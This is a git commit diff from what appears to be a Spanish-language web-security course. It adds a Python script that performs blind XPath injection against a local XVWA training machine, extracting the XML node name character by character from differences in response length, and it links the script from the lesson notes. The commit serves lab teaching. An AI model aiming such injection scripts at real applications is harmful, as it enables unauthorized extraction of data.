Update tema 6
This commit is contained in:
parent
4f4428a390
commit
b705ffba31
@ -0,0 +1,69 @@
|
||||
#!/var/bin/env python
|
||||
|
||||
|
||||
import pdb
|
||||
import requests
|
||||
import signal
|
||||
import string
|
||||
import sys
|
||||
import time
|
||||
|
||||
from pwn import *
|
||||
|
||||
# Ctrl-C handler
|
||||
|
||||
|
||||
def signal_handler(signal, frame):
|
||||
|
||||
print('\n\n[!] Ctrl-C. Saliendo...')
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
|
||||
|
||||
# Variables globales
|
||||
|
||||
main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
|
||||
characters = string.ascii_letters
|
||||
|
||||
|
||||
def xPathInjection():
|
||||
|
||||
data = ""
|
||||
|
||||
p1 = log.progress("Inyeccion XPath")
|
||||
p1.status("Iniciando ataque de fuerza bruta")
|
||||
|
||||
time.sleep(2)
|
||||
|
||||
p2 = log.progress("Data")
|
||||
|
||||
for position in range(1, 8):
|
||||
|
||||
for character in characters:
|
||||
# post_data = {
|
||||
# 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
|
||||
# 'submit': ''
|
||||
# }
|
||||
|
||||
post_data = {
|
||||
'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
|
||||
'submit': ''
|
||||
}
|
||||
|
||||
r = requests.post(main_url, data=post_data)
|
||||
|
||||
if len(r.text) != 8686:
|
||||
|
||||
data += character
|
||||
p2.status(data)
|
||||
break
|
||||
|
||||
p1.success("Inyeccion XPath completada")
|
||||
p2.success("Data: %s" % data)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
xPathInjection()
|
@ -39,6 +39,7 @@ Para protegerse contra las vulnerabilidades de XPath, es importante validar toda
|
||||
A continuación, se proporciona el enlace directo de descarga a la máquina XVWA 1 de Vulnhub, la cual usamos en esta clase para explotar las vulnerabilidades existentes en XPath:
|
||||
|
||||
- XVWA 1: https://www.vulnhub.com/entry/xtreme-vulnerable-web-application-xvwa-1,209/
|
||||
- script Python [xpath_injection.py](./26_xpath/xpath_injection.py)
|
||||
|
||||
|
||||
## 6.27 Insecure Direct Object Reference (IDORs)
|
||||
|
Loading…
Reference in New Issue
Block a user